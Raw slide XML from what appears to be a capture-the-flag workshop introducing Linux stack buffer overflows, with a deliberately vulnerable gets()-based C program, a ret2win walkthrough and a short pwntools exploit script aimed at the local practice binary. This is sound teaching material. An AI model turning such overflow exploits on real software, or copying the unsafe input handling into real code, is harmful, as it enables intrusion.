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Source Code Pro"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Average"/>
      <p:regular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5e076644a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5e076644a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5e076644a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5e076644a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5e076644a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5e076644a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5e076644a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5e076644a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e076644a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5e076644a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6db325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6db325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6db325f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6db325f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6db325f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6db325f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6db325f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6db325f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6db325fa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6db325fa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6db325f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6db325f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5e076644a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5e076644a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6db325f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6db325f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6db325fa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6db325fa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6db325f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6db325f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569c0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7569c0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7569c0a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7569c0a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7569c0a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7569c0a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7569c0a1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7569c0a1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7569c0a1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7569c0a1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79f848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79f848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79f8485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79f8485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5e076644a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5e076644a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79f8485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079f8485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79f8485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79f8485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79f8485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79f8485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079f8485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079f8485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79f8485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79f8485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079f84854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079f84854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5e076644a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5e076644a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5e076644a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5e076644a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e076644a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5e076644a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e076644a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5e076644a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5e076644a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5e076644a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5e076644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5e076644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sy.github.io/gef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INTRODUCTION TO LINUX BINARY EXPLOITATION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Made by retr0, with love.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Interacting with the Challenge - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1105500" y="1313725"/>
            <a:ext cx="6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Grab the python skelton from this workshop github repos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2028250"/>
            <a:ext cx="751522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0" y="4646275"/>
            <a:ext cx="94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Replace the necessary fields with the previously provided info and GRAB YOUR NEXT FLAG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961525" y="1964150"/>
            <a:ext cx="7168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DID YOU GET IT ?</a:t>
            </a:r>
            <a:endParaRPr sz="4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1641300" y="1633050"/>
            <a:ext cx="586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BELTS ON, THINGS GOING TO GET MESSY.</a:t>
            </a:r>
            <a:endParaRPr b="1"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32200" y="2110050"/>
            <a:ext cx="867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THE STACK</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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62900" y="4624875"/>
            <a:ext cx="52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Stack frames, return addresses, …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752225" y="499350"/>
            <a:ext cx="779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WHAT IS A STACK</a:t>
            </a:r>
            <a:endParaRPr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42400" y="1442300"/>
            <a:ext cx="43296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➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="13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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="13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inear data structure.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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Code Pro"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="13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Any operation on the stack is performed in LIFO (Last In First Out) order.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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Code Pro"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="13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Local function variables.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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Code Pro"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="13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Allocate frame for each function that is called.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="13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50" y="1211525"/>
            <a:ext cx="3743076" cy="3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2032350" y="325500"/>
            <a:ext cx="50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BASIC STACK OPERATIONS</a:t>
            </a:r>
            <a:endParaRPr b="1"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725" y="1099425"/>
            <a:ext cx="3710675" cy="35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323600" y="1463750"/>
            <a:ext cx="4543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STACK BASIC OPERATIONS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673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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="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push(): to push an element into the stack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673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Code Pro"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr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pop(): to remove the topmost element from the stack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432350" y="456475"/>
            <a:ext cx="627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IMPORTANT REGISTERS</a:t>
            </a:r>
            <a:endParaRPr b="1"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938100" y="2059125"/>
            <a:ext cx="7672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Code Pro"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="17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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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points to the instruction being executed </a:t>
            </a:r>
            <a:endParaRPr b="1"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Code Pro"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="17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b="1" lang="fr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points to the current end of the stack </a:t>
            </a:r>
            <a:endParaRPr b="1"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ource Code Pro"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr" sz="17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bp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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Used for accessing variables and restoring </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="17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endParaRPr b="1" sz="17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1523750" y="135025"/>
            <a:ext cx="575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CONSIDER THE FOLLOWING PIECE OF  CODE </a:t>
            </a:r>
            <a:endParaRPr sz="24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468650" y="560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568500" y="953725"/>
            <a:ext cx="366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foo2();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foo1();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2535100" y="960250"/>
            <a:ext cx="3707700" cy="383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551025" y="653700"/>
            <a:ext cx="3707700" cy="383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572475" y="653700"/>
            <a:ext cx="366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foo2();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foo1();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472625" y="229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6742275" y="36176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6929775" y="37997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MAIN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791975" y="1592325"/>
            <a:ext cx="336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ALLOCATION A STACK FRAME FOR </a:t>
            </a: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SETTING </a:t>
            </a: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 TO POINT ON </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" u="sng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TOP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THE STACK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 flipH="1">
            <a:off x="5820650" y="3628300"/>
            <a:ext cx="8466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9" name="Google Shape;169;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5452825" y="3423525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6769125" y="47172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STACK</a:t>
            </a:r>
            <a:endParaRPr b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-51425" y="3363950"/>
            <a:ext cx="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>
            <a:off x="248600" y="3564050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551025" y="653700"/>
            <a:ext cx="3707700" cy="383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572475" y="653700"/>
            <a:ext cx="366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foo2();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foo1();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472625" y="229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6742275" y="36176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6929775" y="37997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MAIN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791975" y="895825"/>
            <a:ext cx="336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ALLOCATION A STACK FRAME FOR </a:t>
            </a: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SETTING </a:t>
            </a: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 TO POINT ON </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" u="sng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TOP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THE STACK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 flipH="1">
            <a:off x="5831375" y="2745500"/>
            <a:ext cx="8466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4" name="Google Shape;184;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443300" y="25717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6742275" y="27455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929775" y="29276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FOO1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6769125" y="47172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STACK</a:t>
            </a:r>
            <a:endParaRPr b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409350" y="3949800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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23550" y="3749700"/>
            <a:ext cx="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551025" y="653700"/>
            <a:ext cx="3707700" cy="383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572475" y="653700"/>
            <a:ext cx="366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foo2();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foo1();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472625" y="229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6742275" y="36176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6929775" y="37997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MAIN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4791975" y="381475"/>
            <a:ext cx="336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ALLOCATION A STACK FRAME FOR </a:t>
            </a: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SETTING </a:t>
            </a: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 TO POINT ON </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" u="sng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TOP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THE STACK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 flipH="1">
            <a:off x="5831375" y="1886863"/>
            <a:ext cx="8466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1" name="Google Shape;201;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443300" y="17335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6742275" y="27455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929775" y="29276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FOO1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6769125" y="47172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STACK</a:t>
            </a:r>
            <a:endParaRPr b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6742275" y="18734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6929775" y="20555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FOO2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7" name="Google Shape;207;p31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452200" y="2878225"/>
            <a:ext cx="385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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="109300" y="2704375"/>
            <a:ext cx="3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</a:rPr>
              <a:t>CONTENTS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1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Environment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Setup.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interact with the binary.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Stack.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Exploiting a Stack-based Buffer Overflow.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551025" y="653700"/>
            <a:ext cx="3707700" cy="383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572475" y="653700"/>
            <a:ext cx="366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CALLED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FOO2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foo2();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00">
                <a:solidFill>
                  <a:srgbClr val="F1C23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CALLING FOO1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\n");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foo1();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1472625" y="229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6742275" y="3617600"/>
            <a:ext cx="1414500" cy="8721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6929775" y="3799700"/>
            <a:ext cx="103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MAIN</a:t>
            </a:r>
            <a:endParaRPr sz="2100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765125" y="1195850"/>
            <a:ext cx="336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</a:t>
            </a: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FOO2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STACK FRAME GETS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DEALLOCATED, </a:t>
            </a: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BP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POINTER GETS USED TO RESTORE PREVIOUS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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STACK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STATE, THE SAME GOES FOR </a:t>
            </a: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FOO1</a:t>
            </a:r>
            <a:endParaRPr b="1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 flipH="1">
            <a:off x="5790900" y="3617588"/>
            <a:ext cx="846600" cy="10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0" name="Google Shape;220;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386200" y="342290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769125" y="471720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rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="99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170025" y="1568100"/>
            <a:ext cx="3707700" cy="20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191475" y="1546500"/>
            <a:ext cx="3664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&lt;stdio.h&gt;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&lt;stdlib.h&gt;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fr" sz="1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1337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float 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fr" sz="12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7331.13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char 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name[6]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="12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fr" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFD9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“retr0”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1091625" y="110242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stack_prev.c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152900" y="3810475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6152900" y="2717275"/>
            <a:ext cx="2229000" cy="546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6152900" y="3263875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6152900" y="2170675"/>
            <a:ext cx="2229000" cy="5466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6152900" y="1624075"/>
            <a:ext cx="2229000" cy="546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6078050" y="439367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0x00007ffffffde100</a:t>
            </a:r>
            <a:endParaRPr b="1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335150" y="38836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ADDRESS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6335150" y="33736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SAVED BP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6335150" y="27904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1337</a:t>
            </a:r>
            <a:endParaRPr b="1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335150" y="22438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7331.13</a:t>
            </a:r>
            <a:endParaRPr b="1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6335150" y="1697275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retr0</a:t>
            </a:r>
            <a:endParaRPr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flipH="1" rot="10800000">
            <a:off x="5402825" y="3274600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5041563" y="307990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BP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Google Shape;242;p33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5480200" y="1624075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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151688" y="1429375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6078050" y="1223875"/>
            <a:ext cx="2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0x00007ffffffde0d8</a:t>
            </a:r>
            <a:endParaRPr b="1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2637750" y="191350"/>
            <a:ext cx="386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EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175100" y="2179200"/>
            <a:ext cx="679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LIVE EXAMPLE</a:t>
            </a:r>
            <a:endParaRPr sz="39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603800" y="3028250"/>
            <a:ext cx="59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 code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available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workshop repos on github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55350" y="2110050"/>
            <a:ext cx="903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STACK-BASED BUFFER OVERFLOW</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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609475" y="3071100"/>
            <a:ext cx="61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1153650" y="135000"/>
            <a:ext cx="683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CONSIDER THE FOLLOWING PIECE OF CODE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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130725" y="661275"/>
            <a:ext cx="4296900" cy="43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4663550" y="647000"/>
            <a:ext cx="4296900" cy="43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152400" y="647000"/>
            <a:ext cx="44328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&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="125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&lt;stdlib.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="125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&lt;string.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="125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password[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system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/bin/sh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vuln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pass[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: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fflush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(stdin);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gets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strncmp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(pass, password,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== 0){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 GRANTED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win();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does not match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4659875" y="680325"/>
            <a:ext cx="4189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setvbuf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(stdin,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_IONBF,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setvbuf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(stdout,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_IONBF,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fd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/dev/urandom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(fd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Aborting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exit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 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(fd, password,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init();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vuln();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>
            <a:off x="377175" y="1442325"/>
            <a:ext cx="4382700" cy="25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vuln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fr" sz="125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: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fflush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(stdin);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gets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strncmp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(pass, password,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== 0){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 GRANTED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win();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does not match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398625" y="692225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961125" y="101622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code snippet of vuln from stack-bof.c</a:t>
            </a:r>
            <a:endParaRPr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6152900" y="35466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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152900" y="30366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6335150" y="36015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ADDRESS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 flipH="1" rot="10800000">
            <a:off x="5392100" y="3036650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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074888" y="28689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BP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6335150" y="31098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SAVED BP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6152900" y="24717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6152900" y="19068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282" name="Google Shape;282;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5490925" y="1906850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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119538" y="17227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6335150" y="25449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 + 8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335150" y="1980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5660000" y="13309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current stack frame</a:t>
            </a:r>
            <a:endParaRPr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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202500" y="1401900"/>
            <a:ext cx="8739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lang="fr" sz="2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 </a:t>
            </a:r>
            <a:r>
              <a:rPr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 can hold up to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="20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 bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr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if we add more ? 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lang="fr" sz="2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gets</a:t>
            </a:r>
            <a:r>
              <a:rPr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does not perform any length check so unlimited writes.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overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="20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ip</a:t>
            </a:r>
            <a:endParaRPr sz="20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2707500" y="285050"/>
            <a:ext cx="372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MAN GETS</a:t>
            </a:r>
            <a:endParaRPr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3950"/>
            <a:ext cx="8839199" cy="99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462900" y="3210400"/>
            <a:ext cx="8433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★"/>
            </a:pPr>
            <a:r>
              <a:rPr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(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr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”, </a:t>
            </a:r>
            <a:r>
              <a:rPr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this acts like </a:t>
            </a:r>
            <a:r>
              <a:rPr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), does not perform any length check, use </a:t>
            </a:r>
            <a:r>
              <a:rPr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(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr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%{number_of_bytes]s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”, </a:t>
            </a:r>
            <a:r>
              <a:rPr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instead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★"/>
            </a:pPr>
            <a:r>
              <a:rPr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strcpy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(buf, buf1)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★"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr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fr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buf, SIZE_GREATER_THAN_BUF_SIZE)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★"/>
            </a:pPr>
            <a:r>
              <a:rPr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etc…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09325" y="2481750"/>
            <a:ext cx="80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ALTERNATIVES MIGHT LEAD TO THE SAME BUG</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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377175" y="1442325"/>
            <a:ext cx="4382700" cy="25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lang="fr" sz="125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vuln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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="125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: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fflush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(stdin);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gets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strncmp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(pass, password, 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== 0){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ACCESS GRANTED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win();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</a:t>
            </a:r>
            <a:r>
              <a:rPr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printf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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="125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does not match</a:t>
            </a:r>
            <a:r>
              <a:rPr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");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398625" y="692225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961125" y="101622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code snippet of vuln from stack-bof.c</a:t>
            </a:r>
            <a:endParaRPr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6152900" y="35466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6152900" y="30366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6335150" y="36015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AAAAAAAA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0" name="Google Shape;310;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5392100" y="3036650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40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074888" y="28689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BP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6335150" y="31098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AAAAAAAA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6152900" y="24717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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152900" y="1906850"/>
            <a:ext cx="2229000" cy="54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315" name="Google Shape;315;p40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5490925" y="1906850"/>
            <a:ext cx="4821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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5119538" y="1722750"/>
            <a:ext cx="5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SP</a:t>
            </a:r>
            <a:endParaRPr b="1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6335150" y="25449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AAAAAAAA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6335150" y="1980050"/>
            <a:ext cx="18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AAAAAAAA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660000" y="13309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current stack frame</a:t>
            </a:r>
            <a:endParaRPr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655800" y="408850"/>
            <a:ext cx="720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➔"/>
            </a:pP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giving 32 A’s as input (overflowing </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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buffer)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6292200" y="4239650"/>
            <a:ext cx="29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BP OVERWRITTEN !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IP OVERWRITTEN !</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="16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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314450" y="627925"/>
            <a:ext cx="651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SUMMARY OF WHAT WE HAVE</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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1075200" y="2020975"/>
            <a:ext cx="806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b="1"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Unlimited input</a:t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Code Pro"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr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 over IP</a:t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1075200" y="3296125"/>
            <a:ext cx="63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IS A WIN() FUNCTION IN THE BINARY WHICH IS OUR GOAL, IT SPAWNS A SHELL FOR US, SO NEXT GOAL USING BOTH OF PRIMITIVES WE HAVE IS TO JUMP TO MAIN, IN OTHER WORDS THIS ATTACK CALLED RET2WIN.</a:t>
            </a:r>
            <a:endParaRPr b="1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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PREREQUISITE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2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Any Linux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Distribution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(KALI , UBUNTU, etc …)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AutoNum type="arabicPeriod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Network Connection.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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175100" y="306475"/>
            <a:ext cx="6793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FINDING THE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="21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ADDRESS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="21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 OF WIN</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="21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527200" y="1313725"/>
            <a:ext cx="84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can find the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address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win() by 3 different methods (THERE IS MORE)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1330875" y="2074550"/>
            <a:ext cx="61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</a:t>
            </a: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GDB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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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IDA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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="f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OBJDUMP</a:t>
            </a:r>
            <a:endParaRPr b="1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4102650" y="0"/>
            <a:ext cx="321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877250" y="210025"/>
            <a:ext cx="196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GDB</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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5627775" y="210025"/>
            <a:ext cx="196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IDA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="00FF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381000" y="765950"/>
            <a:ext cx="327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fire the binary in gdb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 info functions</a:t>
            </a:r>
            <a:endParaRPr b="1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5195925" y="719600"/>
            <a:ext cx="49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fire the binary in ida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Font typeface="Source Code Pro"/>
              <a:buChar char="➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr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 win function in 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disassembly view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0" y="1444875"/>
            <a:ext cx="3279000" cy="3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100" y="1777563"/>
            <a:ext cx="4704449" cy="2863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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2188250" y="4164175"/>
            <a:ext cx="1050000" cy="25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43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6045625" y="1913825"/>
            <a:ext cx="1007400" cy="492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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591450" y="210025"/>
            <a:ext cx="196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OBJDUMP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="20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62" y="2036075"/>
            <a:ext cx="7224475" cy="107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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2798975" y="2663875"/>
            <a:ext cx="1060800" cy="1071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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443000" y="338625"/>
            <a:ext cx="6258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LET’S WRITE AN EXPLOIT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="23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1" name="Google Shape;361;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2541450" y="1339475"/>
            <a:ext cx="4061100" cy="295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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3345000" y="877425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  <a:latin typeface="Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="4A86E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2691450" y="1378025"/>
            <a:ext cx="3761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 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pwn </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="125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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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b="1" sz="125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b="1" lang="fr" sz="125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process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25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"./stack-bof"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offset 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24</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="125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win_address 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0x00000000004011a2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1250">
              <a:solidFill>
                <a:srgbClr val="99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payload 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1" lang="fr" sz="125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"A"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24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b="1"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p64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(win_address + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="125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p.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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sendline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fr" sz="1250">
                <a:solidFill>
                  <a:srgbClr val="E691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payload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p.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="125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interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="12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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1887750" y="2163900"/>
            <a:ext cx="5368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LIVE DEMO</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="41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1319850" y="2171550"/>
            <a:ext cx="650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THANK YOU ALL</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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1105500" y="2971950"/>
            <a:ext cx="6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SLIDES AND SOURCE CODES ARE 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AVAILABLE</a:t>
            </a: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ON WORKSHOP’S GITHUB REPOS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928650" y="2117700"/>
            <a:ext cx="7286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ENVIRONNEMENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="47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 SETUP</a:t>
            </a:r>
            <a:endParaRPr sz="47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005975" y="2856775"/>
            <a:ext cx="4961400" cy="429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4425"/>
            <a:ext cx="8520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install the necessary , type in your terminal :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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr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sudo apt update &amp;&amp; sudo apt install gdb -y &amp;&amp; pip3 install pwntools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Code Pro"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="fr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 to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr" sz="15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https://hugsy.github.io/gef/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr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to install gdb-gef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709375" y="499350"/>
            <a:ext cx="71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 success when installing gdb-gef it </a:t>
            </a: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should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr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look like this when running gdb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00" y="1304925"/>
            <a:ext cx="7319999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698650" y="1431600"/>
            <a:ext cx="7833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INTERACTING WITH THE CHALLENGE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="48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REMOTELY</a:t>
            </a:r>
            <a:endParaRPr sz="48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167500" y="2974625"/>
            <a:ext cx="4961400" cy="429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-995300" y="4690350"/>
            <a:ext cx="50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netcat (nc) &amp; pwntools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HOW To Interact With the Challenges - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="fr"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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02300"/>
            <a:ext cx="72199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14300" y="3703325"/>
            <a:ext cx="7715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3C78D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nc &lt;hostname&gt; &lt;challenge port&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="3C78D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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GRAB YOUR FIRST FLAG!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210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to connect through nc and grab your first flag !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